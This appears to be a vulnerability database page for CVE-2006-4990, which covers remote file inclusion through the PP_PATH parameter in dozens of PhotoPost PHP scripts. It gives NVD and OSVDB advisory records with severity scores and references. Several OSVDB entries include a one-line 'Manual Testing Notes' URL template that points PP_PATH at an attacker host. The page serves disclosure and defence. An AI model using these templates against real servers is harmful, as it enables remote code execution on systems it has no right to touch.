Search...

CVE-2006-4990

2006-09-26T02:07:00

ID CVE-2006-4990
Type cve
Reporter cve@mitre.org
Modified 2018-10-17T21:40:00

Description

Multiple PHP remote file inclusion vulnerabilities in PhotoPost allow remote attackers to execute arbitrary PHP code via a URL in the PP_PATH parameter in (1) addfav.php, (2) adm-admlog.php, (3) adm-approve.php, (4) adm-backup.php, (5) adm-cats.php, (6) adm-cinc.php, (7) adm-db.php, (8) adm-editcfg.php, (9) adm-inc.php, (10) adm-index.php, (11) adm-modcom.php, (12) adm-move.php, (13) adm-options.php, (14) adm-order.php, (15) adm-pa.php, (16) adm-photo.php, (17) adm-purge.php, (18) adm-style.php, (19) adm-templ.php, (20) adm-userg.php, (21) adm-users.php, (22) bulkupload.php, (23) cookies.php, (24) comments.php, (25) ecard.php, (26) editphoto.php, (27) register.php, (28) showgallery.php, (29) showmembers.php, (30) useralbums.php, (31) uploadphoto.php, (32) search.php, or (33) adm-menu.php, different vectors than CVE-2006-4828.

JSON Vulners Source

Initial Source

{"id": "CVE-2006-4990", "bulletinFamily": "NVD", "title": "CVE-2006-4990", "description": "Multiple PHP remote file inclusion vulnerabilities in PhotoPost allow remote attackers to execute arbitrary PHP code via a URL in the PP_PATH parameter in (1) addfav.php, (2) adm-admlog.php, (3) adm-approve.php, (4) adm-backup.php, (5) adm-cats.php, (6) adm-cinc.php, (7) adm-db.php, (8) adm-editcfg.php, (9) adm-inc.php, (10) adm-index.php, (11) adm-modcom.php, (12) adm-move.php, (13) adm-options.php, (14) adm-order.php, (15) adm-pa.php, (16) adm-photo.php, (17) adm-purge.php, (18) adm-style.php, (19) adm-templ.php, (20) adm-userg.php, (21) adm-users.php, (22) bulkupload.php, (23) cookies.php, (24) comments.php, (25) ecard.php, (26) editphoto.php, (27) register.php, (28) showgallery.php, (29) showmembers.php, (30) useralbums.php, (31) uploadphoto.php, (32) search.php, or (33) adm-menu.php, different vectors than CVE-2006-4828.", "published": "2006-09-26T02:07:00", "modified": "2018-10-17T21:40:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4990", "reporter": "cve@mitre.org", "references": ["http://www.osvdb.org/32235", "http://www.osvdb.org/32248", "http://www.osvdb.org/32238", "http://www.osvdb.org/32233", "http://www.osvdb.org/32237", "http://www.osvdb.org/32249", "http://www.osvdb.org/32231", "http://www.osvdb.org/32243", "http://www.osvdb.org/32251", "http://www.osvdb.org/32239", "http://www.osvdb.org/32247", "http://www.osvdb.org/32230", "http://www.osvdb.org/32253", "http://www.osvdb.org/32221", "http://www.osvdb.org/32223", "http://securityreason.com/securityalert/1632", "http://www.osvdb.org/32252", "http://www.osvdb.org/32226", "http://www.osvdb.org/32224", "http://www.osvdb.org/32234", "http://www.osvdb.org/32236", "http://www.osvdb.org/32232", "http://www.osvdb.org/32227", "http://www.securityfocus.com/archive/1/446224/100/0/threaded", "http://www.osvdb.org/32246", "http://www.osvdb.org/32228", "http://www.osvdb.org/32229", "http://www.osvdb.org/32245", "http://www.osvdb.org/32240", "http://www.osvdb.org/32225", "http://www.osvdb.org/32250", "http://www.osvdb.org/32222"], "cvelist": ["CVE-2006-4990"], "type": "cve", "lastseen": "2019-05-29T18:08:34", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "a6996eb983bc613b8996512a94ca326b"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "861c507c925bc5dbbdff89d181050e83"}, {"key": "cpe23", "hash": "c28c040099e829fa936d9c2f5fd6d1b9"}, {"key": "cvelist", "hash": "9ceeeba4d8df1d26b6f7321ea9793d38"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "7f7c77d2dde7216a66d00321bd5828f8"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "656ad3ba796b9316b8a2e302c35f15c5"}, {"key": "href", "hash": "a8c18dc354a261810f53b4979f8dee39"}, {"key": "modified", "hash": "146c1faaf0bf567d3e488b4618330266"}, {"key": "published", "hash": "914400a6052e7ed419e8ee3d5d67462e"}, {"key": "references", "hash": "f1bbb82c804759c5c4c3787f64465b0a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "13594efa29da02af48cb0f9e803ae2b9"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "cdcceafd8f58b095382f4678b341eb22d9eebacd23537c8637f5e3d2efd1865d", "viewCount": 1, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2019-05-29T18:08:34"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:32228", "OSVDB:32251", "OSVDB:32246", "OSVDB:32229", "OSVDB:32247", "OSVDB:32242", "OSVDB:32245", "OSVDB:32223", "OSVDB:32239", "OSVDB:32249"]}], "modified": "2019-05-29T18:08:34"}, "vulnersScore": 7.3}, "objectVersion": "1.3", "cpe": ["cpe:/a:photopost:photopost_php_pro:4.6", "cpe:/a:photopost:photopost_php_pro:4.5"], "affectedSoftware": [{"name": "photopost photopost_php_pro", "operator": "eq", "version": "4.6"}, {"name": "photopost photopost_php_pro", "operator": "eq", "version": "4.5"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:photopost:photopost_php_pro:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:photopost:photopost_php_pro:4.5:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-approve.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-approve.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-approve.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32223", "id": "OSVDB:32223", "title": "PhotoPost PHP adm-approve.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-editcfg.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-editcfg.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-editcfg.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32228", "id": "OSVDB:32228", "title": "PhotoPost PHP adm-editcfg.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-inc.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-inc.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-inc.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32229", "id": "OSVDB:32229", "title": "PhotoPost PHP adm-inc.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the bulkupload.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the bulkupload.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/bulkupload.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32242", "id": "OSVDB:32242", "title": "PhotoPost PHP bulkupload.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the ecard.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the ecard.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/ecard.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32245", "id": "OSVDB:32245", "title": "PhotoPost PHP ecard.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the editphoto.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the editphoto.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/editphoto.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32246", "id": "OSVDB:32246", "title": "PhotoPost PHP editphoto.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the register.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the register.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/register.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32247", "id": "OSVDB:32247", "title": "PhotoPost PHP register.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-templ.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-templ.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-templ.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32239", "id": "OSVDB:32239", "title": "PhotoPost PHP adm-templ.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the uploadphoto.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the uploadphoto.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/uploadphoto.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32251", "id": "OSVDB:32251", "title": "PhotoPost PHP uploadphoto.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the addfav.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the addfav.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/addfav.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32221", "id": "OSVDB:32221", "title": "PhotoPost PHP addfav.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}